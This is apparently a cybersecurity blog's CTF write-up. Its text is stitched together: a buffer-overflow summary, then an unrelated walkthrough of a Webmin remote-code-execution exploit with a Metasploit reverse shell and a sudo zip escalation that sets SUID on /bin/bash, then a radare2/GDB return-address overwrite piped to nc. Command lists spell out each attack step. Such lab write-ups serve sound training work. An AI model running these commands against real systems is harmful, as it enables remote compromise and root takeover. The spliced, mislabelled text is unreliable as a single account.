We covered another example of a vulnerable binary to buffer overflow vulnerability. The binary has NX enabled to prevent code execution in the stack but our goal was to control the execution flow and redirect it to the “winner” function to print the flag. We generated a pattern to cause a segmentation fault then we used the address of the “winner” function so that the RIP register points to it after it hits the segmentation fault. This was part of HackTheBox Reg Intro to Binary Exploitation track.

Initial Enumeration

I started with an Nmap scan of the target machine, which revealed two open ports: 22 (SSH) and 10000 (HTTP). The HTTP service on port 10000 was running Webmin, a web-based system configuration tool for Unix-like systems. I then browsed to the Webmin interface

Webmin Exploitation

I attempted to log into Webmin with default credentials, but they didn’t work. I then searched for Webmin exploits and found a remote code execution (RCE) vulnerability (CVE-2019-15107) affecting Webmin versions 1.890 through 1.920. This vulnerability allowed an attacker to execute arbitrary commands by manipulating the old parameter in the password reset functionality.

To exploit this, I used Metasploit. I searched for the relevant module, set the target host and port, and configured the payload to be a reverse shell. I also set my local host and port for the listener. After running the exploit, I successfully obtained a Meterpreter session.

Post-Exploitation and User Flag

Once I had the Meterpreter session, I used the shell command to get a command-line interface on the target machine. I navigated to the /home directory, then into the logan user’s directory. There, I found the user flag in user.txt.

Privilege Escalation

To escalate privileges to root, I first checked the current user’s privileges using sudo -l. I found that the logan user could run /usr/bin/zip as root without a password. This is a common misconfiguration that can lead to privilege escalation.

I then searched for GTFOBins for zip to find a way to exploit this. GTFOBins provides a curated list of Unix binaries that can be used to bypass local security restrictions. The zip entry showed a method to execute arbitrary commands as root using the -sf option in conjunction with a crafted file.

I created a simple shell script named shell.sh that would change the permissions of the /bin/bash executable to SUID, effectively giving me a root shell. I then used the zip command with sudo and the -sf option to execute my shell.sh script. After running the command, I executed /bin/bash -p to get a root shell.

Finally, I navigated to the /root directory and retrieved the root flag from root.txt.

Technical Commands

  • nmap -sC -sV <target_ip>
  • msfconsole
  • search webmin
  • use exploit/linux/http/webmin_backdoor
  • set RHOSTS <target_ip>
  • set RPORT 10000
  • set LHOST <your_ip>
  • set LPORT 4444
  • run
  • shell (within Meterpreter)
  • cd /home/logan
  • cat user.txt
  • sudo -l
  • echo 'chmod +s /bin/bash' > shell.sh
  • sudo /usr/bin/zip -sf shell.sh
  • /bin/bash -p
  • cd /root
  • cat root.txt In this video, I demonstrated how to exploit a binary vulnerable to buffer overflow using Radare2 and GDB.

Initial Analysis with Radare2

I started by analyzing the provided binary file named “rig” using Radare2. I used the command aaa to analyze the binary and afl to list the functions. I identified several functions, including main, gets, puts, and a particularly interesting one called winner. I suspected that the winner function might be responsible for displaying the flag. I also used iz to list strings within the binary, which revealed strings like “Congratulations”, “flag”, “Enter your name”, and “Registered”. I used ie to get the entry point of the main function and iM to get the main function address.

nvestigating the winner Function

I used the command s sym.winner to seek to the winner function and pdf to disassemble it. The disassembly confirmed that the winner function indeed opens a file named “flag.txt”. I then checked if the main function calls the winner function. I used s sym.main and pdf to disassemble main. I found that main only calls a function named run. Disassembling the run function (s sym.run and pdf) showed that it uses gets to take user input, which is a known vulnerability for buffer overflows. It did not call the winner function.

Confirming Buffer Overflow Vulnerability

I ran the binary and provided a long string of ‘A’s (100 ‘A’s) as input. This caused a segmentation fault, confirming the buffer overflow vulnerability.

Finding the Offset with GDB

I switched to GDB (GNU Debugger) to find the exact offset needed to overwrite the instruction pointer. I used pattern create 100 to generate a unique pattern of 100 bytes. I ran the binary within GDB (run <pattern>) and observed the segmentation fault. I then used pattern search with the bytes found in the stack pointer or base pointer to determine the offset. The offset was found to be 56 bytes.

Crafting the Exploit

I determined that since NX (Non-eXecutable stack) was enabled (checked using checksec rig), I couldn’t directly execute shellcode on the stack. Instead, the goal was to redirect the execution flow to the winner function. I needed the memory address of the winner function, which I obtained earlier using Radare2 (afl). I created a Python script (exploit.py) to generate the payload. The payload consisted of 56 bytes of ‘A’s, followed by the memory address of the winner function (in little-endian format).

Executing the Exploit

I executed the Python script and piped its output to the vulnerable binary running on the remote instance. This successfully overwrote the return address on the stack with the address of the winner function. As a result, the winner function was executed, which opened “flag.txt” and displayed its contents.

Technical Commands Used

  • ls
  • file rig
  • r2 rig
  • aaa
  • afl
  • python3 -c "print('A'*100)"
  • ./rig
  • iz
  • ie
  • iM
  • s sym.winner
  • pdf
  • q
  • V
  • v
  • s sym.main
  • s sym.run
  • checksec rig
  • gdb rig
  • pattern create 100
  • run <pattern>
  • pattern search <bytes_from_register>
  • pattern offset <bytes_from_register>
  • exit
  • clear
  • cat exploit.py
  • python exploit.py | nc <host> <port>

Video Walkthrough

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles